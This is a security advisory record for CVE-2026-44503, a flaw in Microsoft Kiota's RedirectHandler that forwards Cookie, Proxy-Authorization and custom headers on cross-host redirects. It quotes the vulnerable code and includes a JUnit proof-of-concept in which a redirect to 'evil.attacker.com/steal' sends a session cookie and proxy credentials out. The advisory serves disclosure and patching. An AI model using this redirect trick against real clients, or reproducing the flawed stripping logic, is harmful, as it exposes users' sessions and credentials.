GHSA-7j59-v9qr-6fq9

Source

https://github.com/advisories/GHSA-7j59-v9qr-6fq9

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-7j59-v9qr-6fq9

Aliases

CVE-2026-44503

Downstream

MINI-9frx-jg92-9jqf

MINI-m767-3wgj-99f3

Related

CGA-cg9g-rqh6-8qcp

Published

2026-05-07T01:49:01Z

Modified

2026-05-07T20:14:23.195802410Z

Severity

7.0 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N CVSS Calculator

Summary

Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect

Details

Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

https://github.com/microsoft/kiota-dotnet https://github.com/microsoft/kiota-java https://github.com/microsoft/kiota-python https://github.com/microsoft/kiota-typescript https://github.com/microsoft/kiota-http-go

Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.

This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier:

boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
requestBuilder.removeHeader("Authorization");
// BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}

PoC

Clone the repository: git clone --depth 1 https://github.com/microsoft/kiota-java.git cd kiota-java
Create the PoC test file at: components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java

With this content:

package com.microsoft.kiota.http.middleware;
import static org.junit.jupiter.api.Assertions.*;
import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
@Test
void crossHostRedirectLeaksCookies() throws Exception {
Request original = new Request.Builder()
.url("http://trusted.example.com/api")
.addHeader("Authorization", "Bearer token")
.addHeader("Cookie", "session=SECRET")
.addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
.build();
Response redirect = new Response.Builder()
.request(original).protocol(Protocol.HTTP_1_1)
.code(302).message("Found")
.header("Location", "http://evil.attacker.com/steal")
.body(ResponseBody.create("", MediaType.parse("text/plain")))
.build();
Request result = new RedirectHandler().getRedirect(original, redirect);
assertNotNull(result);
assertEquals("evil.attacker.com", result.url().host());
assertNull(result.header("Authorization")); // stripped (good)
assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
}

@Test
void endToEndProof() throws Exception {
var evil = new MockWebServer();
evil.start();
evil.enqueue(new MockResponse().setResponseCode(200));
var trusted = new MockWebServer();
trusted.start();
trusted.enqueue(new MockResponse().setResponseCode(302)
.setHeader("Location", evil.url("/steal")));
OkHttpClient client = KiotaClientFactory.create(
new Interceptor[]{new RedirectHandler()}).build();
client.newCall(new Request.Builder().url(trusted.url("/api"))
.addHeader("Cookie", "session=SECRET").build()).execute();
trusted.takeRequest();
RecordedRequest captured = evil.takeRequest();
assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
evil.shutdown();
trusted.shutdown();
}
}

Run the tests: ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"
Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures. Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

Impact

The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact: - Session hijacking via leaked Cookie headers - Corporate proxy credential theft via leaked Proxy-Authorization - API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T01:49:01Z",
    "cwe_ids": [
        "CWE-601"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}

References

Affected packages

github.com/microsoft/kiota-http-go

Package

Name: github.com/microsoft/kiota-http-go; View open source insights on deps.dev
Purl: pkg:golang/github.com/microsoft/kiota-http-go

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.5.5

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"

Maven

com.microsoft.kiota:microsoft-kiota-abstractions

Package

Name: com.microsoft.kiota:microsoft-kiota-abstractions; View open source insights on deps.dev
Purl: pkg:maven/com.microsoft.kiota/microsoft-kiota-abstractions

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.9.1

Affected versions

0.*

0.1.2

0.2.0

0.2.1

0.3.0

0.3.1

0.3.2

0.3.3

0.4.0

0.4.1

0.4.2

0.4.3

0.4.4

0.4.5

0.4.6

0.4.7

0.5.0

0.6.0

0.7.0

0.7.1

0.7.2

0.7.3

0.7.4

0.7.5

0.7.6

0.7.7

0.7.8

0.8.0

0.9.0

0.9.1

0.9.2

0.10.0

0.11.0

0.11.1

0.11.2

0.12.0

0.12.1

0.12.2

1.*

1.0.0

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.6

1.1.0

1.1.1

1.1.2

1.1.3

1.1.4

1.1.5

1.1.6

1.1.7

1.1.8

1.1.9

1.1.10

1.1.11

1.1.12

1.1.13

1.1.14

1.2.0

1.3.0

1.4.0

1.5.0

1.5.1

1.6.0

1.7.0

1.8.0

1.8.1

1.8.2

1.8.3

1.8.4

1.8.5

1.8.6

1.8.7

1.8.8

1.8.9

1.8.10

1.8.11

1.8.12

1.9.0

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"

npm

kiota-typescript

Package

Name: kiota-typescript; View open source insights on deps.dev
Purl: pkg:npm/kiota-typescript

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.0.0-preview.100

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"

NuGet

Microsoft.Kiota.Abstractions

Package

Name: Microsoft.Kiota.Abstractions; View open source insights on deps.dev
Purl: pkg:nuget/Microsoft.Kiota.Abstractions

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.22.0

Affected versions

1.*

1.0.0

1.0.1

1.1.0

1.1.1

1.1.2

1.1.3

1.1.4

1.2.0

1.2.1

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.3.5

1.4.0

1.5.0

1.6.0

1.6.1

1.7.0

1.7.1

1.7.2

1.7.3

1.7.4

1.7.5

1.7.6

1.7.7

1.7.8

1.7.9

1.7.10

1.7.11

1.7.12

1.8.0

1.8.1

1.8.2

1.8.3

1.8.4

1.9.0

1.9.1

1.9.2

1.9.3

1.9.4

1.9.5

1.9.6

1.9.7

1.9.8-preview

1.9.8

1.9.9

1.9.10

1.9.11

1.9.12

1.10.0

1.10.1

1.11.0

1.11.1

1.11.2

1.11.3

1.12.0

1.12.1

1.12.2

1.12.3

1.12.4

1.13.0

1.13.1

1.13.2

1.14.0

1.15.0

1.15.1

1.15.2

1.16.0

1.16.1

1.16.2

1.16.3

1.16.4

1.17.0

1.17.1

1.17.2

1.17.3

1.17.4

1.18.0

1.19.0

1.19.1

1.20.0

1.20.1

1.21.0

1.21.1

1.21.2

1.21.3

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"

PyPI

microsoft-kiota-http

Package

Name: microsoft-kiota-http; View open source insights on deps.dev
Purl: pkg:pypi/microsoft-kiota-http

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.9.9

Affected versions

0.*

0.1.0

0.1.1

0.1.2

0.2.0

0.2.1

0.2.2

0.2.3

0.3.0

0.3.1

0.4.0

0.4.1

0.4.2

0.4.3

0.4.4

0.5.0

0.6.0

0.6.1

0.6.2

0.6.3

1.*

1.0.0

1.1.0

1.2.0

1.2.1

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.4.4

1.4.5

1.4.6

1.5.0

1.6.0

1.6.1

1.6.2

1.6.3

1.6.4

1.6.5

1.6.6

1.6.7

1.6.8

1.7.0

1.7.1

1.8.0

1.9.0

1.9.1

1.9.2

1.9.3

1.9.4

1.9.5

1.9.6

1.9.7

1.9.8

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"